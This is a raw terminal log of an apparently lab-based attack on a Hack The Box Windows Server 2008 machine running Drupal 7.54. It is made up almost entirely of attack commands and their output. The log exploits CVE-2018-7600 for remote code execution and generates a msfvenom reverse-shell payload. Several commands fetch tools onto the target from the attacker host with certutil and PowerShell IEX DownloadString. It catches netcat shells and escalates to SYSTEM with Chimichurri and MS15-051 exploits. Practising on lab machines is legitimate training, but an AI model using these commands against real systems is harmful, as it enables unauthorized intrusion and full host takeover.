┌──(kali㉿kali)-[~]
└─$ nmap -Pn 10.129.47.150                                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 08:47 EST
Nmap scan report for 10.129.47.150
Host is up (0.35s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 26.91 seconds

┌──(kali㉿kali)-[~/WPE/Bastard]
└─$ nmap -T4 -p- -A -Pn 10.129.47.150                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 08:45 EST
Nmap scan report for 10.129.47.150
Host is up (0.39s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2693.30 seconds

┌──(kali㉿kali)-[/opt/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://10.129.47.150/ -c "whoami"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-Fk3-z5KxIScxY3NI9kCyRQMoha-HG4QlQ7BItJhS8aY
[*] Triggering exploit to execute: whoami
nt authority\iusr

┌──(kali㉿kali)-[/opt/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://10.129.47.150/ -c 'systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"'

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-MdDA9Xm1kEAINJrBYFnXxMip_gRl2iUGoK6bFndlygw
[*] Triggering exploit to execute: systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC

┌──(kali㉿kali)-[~/WPE/Bastard]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.24 LPORT=443 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
                                                                                                                    
┌──(kali㉿kali)-[~/WPE/Bastard]
└─$ sudo python -m SimpleHTTPServer 80                                                      
Serving HTTP on 0.0.0.0 port 80 ...

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 443                      
listening on [any] 443 ...
connect to [10.10.16.24] from (UNKNOWN) [10.129.47.150] 55171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

C:\inetpub\drupal-7.54>systeminfo
systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          19/1/2024, 3:43:41 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.515 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.522 MB
Virtual Memory: In Use:    573 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.47.150

┌──(kali㉿kali)-[/opt/Windows-Exploit-Suggester-python3-master]
└─$ sudo ./windows-exploit-suggester.py --database 2024-01-19-mssb.xlsx --systeminfo /home/kali/WPE/Bastard/systeminfo.txt 
[*] initiating winsploit version 3.4...
[*] database file detected as xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

──(kali㉿kali)-[/opt/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://10.129.47.150/ -c 'certutil -urlcache -f http://10.10.16.24/Chimichurri.exe c:\temp\c.exe'     

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-B-hjq69ScaYAMrBRMv-09EvtC2LTu7nvo2SK7BNascs
[*] Triggering exploit to execute: certutil -urlcache -f http://10.10.16.24/Chimichurri.exe c:\temp\c.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

                                                                                                                    
┌──(kali㉿kali)-[/opt/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://10.129.47.150/ -c 'c:\temp\c.exe 10.10.16.24 7777'

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-4OoJgxQaHDL-dLMN5IZbsL-NX4J_xoB7Kg8shvTPqhE
[*] Triggering exploit to execute: c:\temp\c.exe 10.10.16.24 7777

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 7777          
listening on [any] 7777 ...
connect to [10.10.16.24] from (UNKNOWN) [10.129.47.150] 55183
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

c:\temp>echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.24/Sherlock.ps1') | powershell -noprofile -
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.24/Sherlock.ps1') | powershell -noprofile -


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
             tml
VulnStatus : Not Vulnerable

c:\temp>certutil -urlcache -f http://10.10.16.24/ms15-051x64.exe ms15-051.exe
certutil -urlcache -f http://10.10.16.24/ms15-051x64.exe ms15-051.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>whoami
whoami
nt authority\iusr

c:\temp>ms15-051.exe
ms15-051.exe
[#] ms15-051 fixed by zcgonvh
[#] usage: ms15-051 command 
[#] eg: ms15-051 "whoami /all" 

c:\temp>whoami
whoami
nt authority\iusr

c:\temp>ms15-051.exe whoami
ms15-051.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1044 created.
==============================
nt authority\system

c:\temp>certutil -urlcache -f http://10.10.16.24/nc1.exe nc1.exe
certutil -urlcache -f http://10.10.16.24/nc1.exe nc1.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>certutil -urlcache -f http://10.10.16.24/nc64.exe nc64.exe
certutil -urlcache -f http://10.10.16.24/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>certutil -urlcache -f http://10.10.16.24/nc.exe nc.exe
certutil -urlcache -f http://10.10.16.24/nc.exe nc.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>certutil -urlcache -f http://10.10.16.24/ms15-051x64.exe ms15-051.exe             
certutil -urlcache -f http://10.10.16.24/ms15-051x64.exe ms15-051.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>whoami
whoami
nt authority\iusr

┌──(kali㉿kali)-[/opt]
└─$ nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.16.24] from (UNKNOWN) [10.129.29.65] 49197
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\temp>whoami
whoami
nt authority\system